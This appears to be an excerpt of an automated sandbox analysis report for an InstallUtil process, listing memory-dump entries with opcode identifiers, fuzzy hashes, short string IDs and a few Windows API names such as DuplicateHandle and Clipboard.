                                                                                • Instruction Fuzzy Hash: FDC19B34A006159FDB14DF69C480AAEBBF2FF88314F158569E8099B3A5DB30FD46CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Plq$$q
                                                                                • API String ID: 0-181920578
                                                                                • Opcode ID: 5ec654bf23e30faf43efdd15ff2a7f098b1ea0b3a29da980042382e4837f3df9
                                                                                • Instruction ID: e92b0bfa249c4665513831bb2edf08f470fcd2b0c0245b45c96553b9303bb01b
                                                                                • Opcode Fuzzy Hash: 5ec654bf23e30faf43efdd15ff2a7f098b1ea0b3a29da980042382e4837f3df9
                                                                                • Instruction Fuzzy Hash: C9B11534B002148FDB14DF69D484AAEBBF6BF89711B1540A9E505CB372EB31ED41CBA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: 4150828146086e2eaaa1eff40708763f197dcd62b076445435d07ea7595c02ae
                                                                                • Instruction ID: 15821af192a1fa7cff0b1f15d2d1c06ef20fad40377662b29983e53609d09a46
                                                                                • Opcode Fuzzy Hash: 4150828146086e2eaaa1eff40708763f197dcd62b076445435d07ea7595c02ae
                                                                                • Instruction Fuzzy Hash: 76C1E775A00218CFDB14EFA4D994A9DB7B6FF89304F104569E906AB3A4DB71EC02CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452072673.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2340000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: ec0d45afcb18676c0cbe7ed79d664651831e3c7131d3d2937ceb2b16ea3e20f0
                                                                                • Instruction ID: 12faf81b9075a66e6b4b9f3e3bdf7598cab6c62fa07f9f72c6136ef8eaea72b2
                                                                                • Opcode Fuzzy Hash: ec0d45afcb18676c0cbe7ed79d664651831e3c7131d3d2937ceb2b16ea3e20f0
                                                                                • Instruction Fuzzy Hash: 13818F31F50520474E3A2764106933E25EFABC9721724497EEE13DB398DF25EC02ABD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: 04d95d1bc503fb9fd9938b819d6465ba342be70d29ac1fb4c67e9ef49f07dc78
                                                                                • Instruction ID: a0d17614339457281d80054daa8b1b960bbfb301400078dd5e6885460c4d47e9
                                                                                • Opcode Fuzzy Hash: 04d95d1bc503fb9fd9938b819d6465ba342be70d29ac1fb4c67e9ef49f07dc78
                                                                                • Instruction Fuzzy Hash: EEC1E775B00218DFDB14EFA4D994A9DB7B6FF89304F104568E506AB3A4DB71EC42CB50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$Hq
                                                                                • API String ID: 0-1154169777
                                                                                • Opcode ID: a790d632bd36d6131bd0d8fa7c0cc2d8b73ca2cc326956eb31c3820b4452256c
                                                                                • Instruction ID: a6dceef2134fa3fb959f4c360e4ef21980b2046bccaf9352209c05909ce27870
                                                                                • Opcode Fuzzy Hash: a790d632bd36d6131bd0d8fa7c0cc2d8b73ca2cc326956eb31c3820b4452256c
                                                                                • Instruction Fuzzy Hash: 0771E374B006158FD705EF28D454A6EB7B6EFCA304B10456AE506DB3A1DB34ED06CBA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (&q$(q
                                                                                • API String ID: 0-2464455664
                                                                                • Opcode ID: 6602a50992316cea48d6dada9d17d8dc595a920baee999150f954e13c7a6d36b
                                                                                • Instruction ID: 22814c5ad7ef3d0973d9493e71246247275bd3d41a70e577b1d6bded4f8e3903
                                                                                • Opcode Fuzzy Hash: 6602a50992316cea48d6dada9d17d8dc595a920baee999150f954e13c7a6d36b
                                                                                • Instruction Fuzzy Hash: A371B331F002189BEB59DFB5D8907AEBBB2AFC8710F558129E805EB380DE709D46C795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q
                                                                                • API String ID: 0-3126353813
                                                                                • Opcode ID: 38c8f5f6dbc5d728fa52d82e3afc79553eed01adde86e952d52fe3be06c65b5c
                                                                                • Instruction ID: d134b624328a68b46bc59583d9c713e3d7afa5eb3dbbc00b72c23cb6dc8d7cc0
                                                                                • Opcode Fuzzy Hash: 38c8f5f6dbc5d728fa52d82e3afc79553eed01adde86e952d52fe3be06c65b5c
                                                                                • Instruction Fuzzy Hash: 0371F330A10201DFDB94DFA4D844B6AF3B2FB80310F65C669DA65AB352DB30EE41CB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$Hq
                                                                                • API String ID: 0-1154169777
                                                                                • Opcode ID: 54933b5a68f16a83605a55194fa161e59ca4da2c599581db10e22d05946d00b9
                                                                                • Instruction ID: 37d343c4556ec42e64187fc0aa968e57db9910ce880287c084cabd4b20b385de
                                                                                • Opcode Fuzzy Hash: 54933b5a68f16a83605a55194fa161e59ca4da2c599581db10e22d05946d00b9
                                                                                • Instruction Fuzzy Hash: 5151AC74B002148FDB29AF78D454A6E77B7AFC5301B6448ADE50ACB3A1DE71ED02CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$,q
                                                                                • API String ID: 0-275420656
                                                                                • Opcode ID: 868f73be296d0da37419b72b6962f1720d2dfe706fa6f54f5b5ff5acc855f140
                                                                                • Instruction ID: 55c0f501ce0936d6f8d1d211884ab3d31887ce4904a6bada65a1079004378478
                                                                                • Opcode Fuzzy Hash: 868f73be296d0da37419b72b6962f1720d2dfe706fa6f54f5b5ff5acc855f140
                                                                                • Instruction Fuzzy Hash: 3041E533B001596FDF029EE9AC509FFBBEEEF89210B04406AFA04D7241D925DD2597B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$(q
                                                                                • API String ID: 0-2485164810
                                                                                • Opcode ID: dae73ff301561c4b415a255a477c248ca50743ca12bb3dea488068920a11a3e6
                                                                                • Instruction ID: 060b15070aa8a390f963959c360d5947ae662721ca55c660c46d9fa1768f1906
                                                                                • Opcode Fuzzy Hash: dae73ff301561c4b415a255a477c248ca50743ca12bb3dea488068920a11a3e6
                                                                                • Instruction Fuzzy Hash: 85412471E043558FDB159BB998112EEBFF2EFCA210B24816AD505FB342EA319D0787A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q
                                                                                • API String ID: 0-3126353813
                                                                                • Opcode ID: 8d8eeae3ad8e0481299fcd466db25a640c3c2debafa9a3ceddc1c3a96fc563c5
                                                                                • Instruction ID: 7b0a414b09f321349cd24003137ab7a05c6e8aa7cb113913d483e25ca3fb6f6e
                                                                                • Opcode Fuzzy Hash: 8d8eeae3ad8e0481299fcd466db25a640c3c2debafa9a3ceddc1c3a96fc563c5
                                                                                • Instruction Fuzzy Hash: A651E230A10205CFDB94DFA4D444BA9F3B2FB80310F65C56ACA65AB352D730EE41CBA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q
                                                                                • API String ID: 0-3126353813
                                                                                • Opcode ID: 6eab6eec2a167328ffb0c152ae2ce57fc6fd0caf59f80bb65970a52293896e7e
                                                                                • Instruction ID: ef9e9f5f51f9c3f70c3addb1899d9d480cf2ade3fce0b51f0b27cb948bd28ccc
                                                                                • Opcode Fuzzy Hash: 6eab6eec2a167328ffb0c152ae2ce57fc6fd0caf59f80bb65970a52293896e7e
                                                                                • Instruction Fuzzy Hash: 0D41B530B002058FE755D775E81877BB3E7EBC4250F16C0AED90A87769FEB198018795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PHq$`Qq
                                                                                • API String ID: 0-577899614
                                                                                • Opcode ID: 719f8a1575d44590be705646cfb6effebece6c6739e12baaaf0ae8b93460e378
                                                                                • Instruction ID: 0d65a81c58700c8b7dd7fe4648fa62ae9dd26f5484e17c94044fc59eb6d821e4
                                                                                • Opcode Fuzzy Hash: 719f8a1575d44590be705646cfb6effebece6c6739e12baaaf0ae8b93460e378
                                                                                • Instruction Fuzzy Hash: B95172B0F44228CBDB24DF65D85976DB77ABB49301F1048A9E90A973C1DB78AD90CF84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$pq
                                                                                • API String ID: 0-2294260830
                                                                                • Opcode ID: 64ab444d71ed28997b163cf868f6cf7771a6e3ee7e0fa7429c41470c3695295d
                                                                                • Instruction ID: 370423e56c37842d856192f78a3721e399d8552582fbe9badd2d5a15851f1875
                                                                                • Opcode Fuzzy Hash: 64ab444d71ed28997b163cf868f6cf7771a6e3ee7e0fa7429c41470c3695295d
                                                                                • Instruction Fuzzy Hash: 5B41BE30E003059FDB25DB69D8907EEBBE3EFC9300F14892CD0499B755DB71AA068BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tn^H$tn^Q
                                                                                • API String ID: 0-3032967048
                                                                                • Opcode ID: 8f77a090ae32fdfc3c70e3109bf54c1cb0655f5ec328522a7a3af5a54b6031f9
                                                                                • Instruction ID: f47824370ad2db46656c999a7ae43becad7f8965c8da647e56422e3701c62893
                                                                                • Opcode Fuzzy Hash: 8f77a090ae32fdfc3c70e3109bf54c1cb0655f5ec328522a7a3af5a54b6031f9
                                                                                • Instruction Fuzzy Hash: 15312B13C153606FE321EF7CA8A52E97BE5AE85260F094297C8848E152E4205A4BC3EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q$$q
                                                                                • API String ID: 0-3126353813
                                                                                • Opcode ID: 926112102a3b3bd9f169531c05dc187c2678c22d06128785db9c355f3569d782
                                                                                • Instruction ID: 0dce5a14b9b07b6103be9c1620ce5dfcd1cdf9434ab76f1c12ab59e284009300
                                                                                • Opcode Fuzzy Hash: 926112102a3b3bd9f169531c05dc187c2678c22d06128785db9c355f3569d782
                                                                                • Instruction Fuzzy Hash: 4431E671B042008FE795DA55E84577AA3E2F7C52A9F16C5BAC849872A8FFB1980187C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$Hq
                                                                                • API String ID: 0-1154169777
                                                                                • Opcode ID: 30b080d8b27ba7d298d01a87788ced64ed24032e5c53505dfc32474a30c0b120
                                                                                • Instruction ID: bf98ca5d3a2d6e1202fdfc6858e0fafc1d4d57271e8dfa67a43c5b09b7d69e35
                                                                                • Opcode Fuzzy Hash: 30b080d8b27ba7d298d01a87788ced64ed24032e5c53505dfc32474a30c0b120
                                                                                • Instruction Fuzzy Hash: 6821F771B082445FE701EF75E850A5E7BE6EFC631471445AAE409CF361DE709D0683A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %$Lw
                                                                                • API String ID: 0-749731908
                                                                                • Opcode ID: a4d9f31107209985eba86d1f3cd2612e8acef5ec987a010c0a886c415c23fdef
                                                                                • Instruction ID: 9b6ee82d0f2fdf0fd4964bf833fb0510d35ba2356c62c2e0a4de488b385f4c17
                                                                                • Opcode Fuzzy Hash: a4d9f31107209985eba86d1f3cd2612e8acef5ec987a010c0a886c415c23fdef
                                                                                • Instruction Fuzzy Hash: E5110730A012148FD794DB68D869BAAB7F2FB48300F51C0AEE40ADB294DE75AD41CF55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: a5d46f1f95991a244b05738278b3cf7debe59f6d9f2379c6c8216419adf5ecbf
                                                                                • Instruction ID: 7df747fdfe2b2704fc268ff43a8eb4b8f8f46ecff85a19fc21f8157a9e4abf3f
                                                                                • Opcode Fuzzy Hash: a5d46f1f95991a244b05738278b3cf7debe59f6d9f2379c6c8216419adf5ecbf
                                                                                • Instruction Fuzzy Hash: 19122474B041408FD715EFA8D4997ED37A3EBD6304F1A84B4C4018BA9AEB34BC079BA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (_q
                                                                                • API String ID: 0-3590916094
                                                                                • Opcode ID: d1baf73b4bc71c0bb3b34c2e3ce93882f5af34ab313e029d2f16b037d5fd2c1e
                                                                                • Instruction ID: 6325956b0851a363450f2e1c409df9c7efa33779cda2365e7158f3bb070b97f4
                                                                                • Opcode Fuzzy Hash: d1baf73b4bc71c0bb3b34c2e3ce93882f5af34ab313e029d2f16b037d5fd2c1e
                                                                                • Instruction Fuzzy Hash: FE22AB75B002149FDB14DFA9D490AADB7B2FF88301F188169E905EB3A1DB72ED50CB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: 9be848325e559958617de2e89156dc8fd86e37cfbc47f8fac466d28ea2d6ecc5
                                                                                • Instruction ID: 548e119ab53b7ecd5a0a3b4b2081aee539e9af4989e194d40462a86461232abc
                                                                                • Opcode Fuzzy Hash: 9be848325e559958617de2e89156dc8fd86e37cfbc47f8fac466d28ea2d6ecc5
                                                                                • Instruction Fuzzy Hash: 5AE1CE70B041048FD714EFA9E045BAE76A7EBC4300F2585B8D8065BB99EF34BC46DB96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: 831919104bce32243b37e085e6e47a74c94274f424de17831f01487d289586a6
                                                                                • Instruction ID: c898872130e4d6849a0f6ceb1ad772e790bc22a5922018de7ccc7ea320d8885d
                                                                                • Opcode Fuzzy Hash: 831919104bce32243b37e085e6e47a74c94274f424de17831f01487d289586a6
                                                                                • Instruction Fuzzy Hash: 69D1BE70B041048BD714EFA8E045BAE77A7EBC4300F2585B8D8065BB99EF74BC46DB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: ea97b72cb132ca1938c1fd151f9b0457d08366cea61a2e89567e8c2b967c4872
                                                                                • Instruction ID: e67b19653e5d9974b3f82350e13af9f23ff7e9f0c5984a5ff628260d45192c54
                                                                                • Opcode Fuzzy Hash: ea97b72cb132ca1938c1fd151f9b0457d08366cea61a2e89567e8c2b967c4872
                                                                                • Instruction Fuzzy Hash: 07D1AD70B04100CFD714EFA8E045BAE76A7EB84300F2585B8D8065BB99EF74BC46DB96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: 7f9f95e9a8d3660917428609173e67a0a73a48a86dbdbd50605d90d8205a4a06
                                                                                • Instruction ID: f4b7cc045ef104bdc0fd15392c5b7f20b599ab6f3d3dbb547fb16971639277ba
                                                                                • Opcode Fuzzy Hash: 7f9f95e9a8d3660917428609173e67a0a73a48a86dbdbd50605d90d8205a4a06
                                                                                • Instruction Fuzzy Hash: CED19C70B04100CFD714EFA9E045BAE76A7EB84300F2585B8D8065BB99EF74BC46EB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: 3b323e0fd88e6eab6f3ba7d3a5dacd5a7428af4eba79bfbe2d9c578fc2b8321e
                                                                                • Instruction ID: 9e8e74addb7fdca5692f7ac588c9a9d968a45dd1a8c98086789d8634d3d7e019
                                                                                • Opcode Fuzzy Hash: 3b323e0fd88e6eab6f3ba7d3a5dacd5a7428af4eba79bfbe2d9c578fc2b8321e
                                                                                • Instruction Fuzzy Hash: F5D1BD70B04104CFD714EFA8E045BAE76A7EB84300F2585B8D8065BB99EF74BC46DB96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: 50bcf5b3748da757c3052ef473f34a79c41a825e7a97046a27749f89d8353140
                                                                                • Instruction ID: 377edcb2f4ccc9c51ed36dcc8371c968504f2e1f5a090f93749ea5c2278f26f3
                                                                                • Opcode Fuzzy Hash: 50bcf5b3748da757c3052ef473f34a79c41a825e7a97046a27749f89d8353140
                                                                                • Instruction Fuzzy Hash: E1D1AC70B041008FD714EFA9E045BAE76A7EB84300F2585B8D8065BBA9EF74BC46DB95
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(00000000,00000000,05678F9C,?,00000000,056903F4,00000000,?,?,?,?), ref: 0569C74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 574225fd3323819b163eaf570b5be610b2bfb21b2521fe2f798c1bda330f5252
                                                                                • Instruction ID: 5909c9985d91d9a154ce9bf59de206b3e521c71e2a759c91c6179b8b34988e06
                                                                                • Opcode Fuzzy Hash: 574225fd3323819b163eaf570b5be610b2bfb21b2521fe2f798c1bda330f5252
                                                                                • Instruction Fuzzy Hash: 4D31ACB18053889FDB12CFA9C880ADEBFF4EF49210F05805AE854EB251D3349844CBA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: aq
                                                                                • API String ID: 0-608928628
                                                                                • Opcode ID: 939485e821ece01b83a1db2a72aeb9aaab8a6d316ed1c2a859e44358e62c894a
                                                                                • Instruction ID: 656ac5c197bc9176948cc185452ef10189cbb5e33db72f1e0f90a0f8eebee995
                                                                                • Opcode Fuzzy Hash: 939485e821ece01b83a1db2a72aeb9aaab8a6d316ed1c2a859e44358e62c894a
                                                                                • Instruction Fuzzy Hash: 93D1BE70B04140CFD714EFA8E045BAE76A7EB84300F2585B8D8065BB99EF34BC46EB95
                                                                                APIs
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 05690CCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: FromMonitorPoint
                                                                                • String ID:
                                                                                • API String ID: 1566494148-0
                                                                                • Opcode ID: d7d5a53bf02577968caccac868052d6711ded6b34bbd13d212f6d55a9f8159f7
                                                                                • Instruction ID: f0db23d22215809c8833017c4510872b04874e7f249d272408240164926524e3
                                                                                • Opcode Fuzzy Hash: d7d5a53bf02577968caccac868052d6711ded6b34bbd13d212f6d55a9f8159f7
                                                                                • Instruction Fuzzy Hash: AF215975804358CFDB10DFA9D8457DEBBF4EF45324F10801AD855AB242C734A949CBA6
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard
                                                                                • String ID:
                                                                                • API String ID: 220874293-0
                                                                                • Opcode ID: 9fc485566b8ec46dd5fd627e0031bd8e80df069991d8855e510423e68ed6c9e4
                                                                                • Instruction ID: 43ab0aafc4ca324a15f79a86fe29f57b69b79c5d4a8982cbc168323bec199763
                                                                                • Opcode Fuzzy Hash: 9fc485566b8ec46dd5fd627e0031bd8e80df069991d8855e510423e68ed6c9e4
                                                                                • Instruction Fuzzy Hash: A431E1B0D11258DFEB24CF99D984B9DBBF5BB48304F248059E005BB390DB74A945CB65
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard
                                                                                • String ID:
                                                                                • API String ID: 220874293-0
                                                                                • Opcode ID: f2511ae275f72c8a461664bde4e0b9762d9cc5031dfd4bcabec7340ee0368c17
                                                                                • Instruction ID: db699dff813a010b7e9cd02cba25c0501c6b9c885ad240af5c52b16721d0ee13
                                                                                • Opcode Fuzzy Hash: f2511ae275f72c8a461664bde4e0b9762d9cc5031dfd4bcabec7340ee0368c17
                                                                                • Instruction Fuzzy Hash: A631E2B0D11258DFEB24CF99C984B8DBBF5BB48304F248069E405BB390DBB4A845CB65
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(00000000,00000000,05678F9C,?,00000000,056903F4,00000000,?,?,?,?), ref: 0569C74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: bc6676f87ba9e44e554895e71eb59d291669a1f38f5a1f44cdf74ce67aa7b171
                                                                                • Instruction ID: b650b758f79ef704d5790cac5d0c13e2ad426949dbb8697395784206ebc424f8
                                                                                • Opcode Fuzzy Hash: bc6676f87ba9e44e554895e71eb59d291669a1f38f5a1f44cdf74ce67aa7b171
                                                                                • Instruction Fuzzy Hash: A021D2B59012489FDF10CFAAD984ADEBBF8EB48310F14801AE918A7350D374A941CFA5
                                                                                APIs
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 05690CCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: FromMonitorPoint
                                                                                • String ID:
                                                                                • API String ID: 1566494148-0
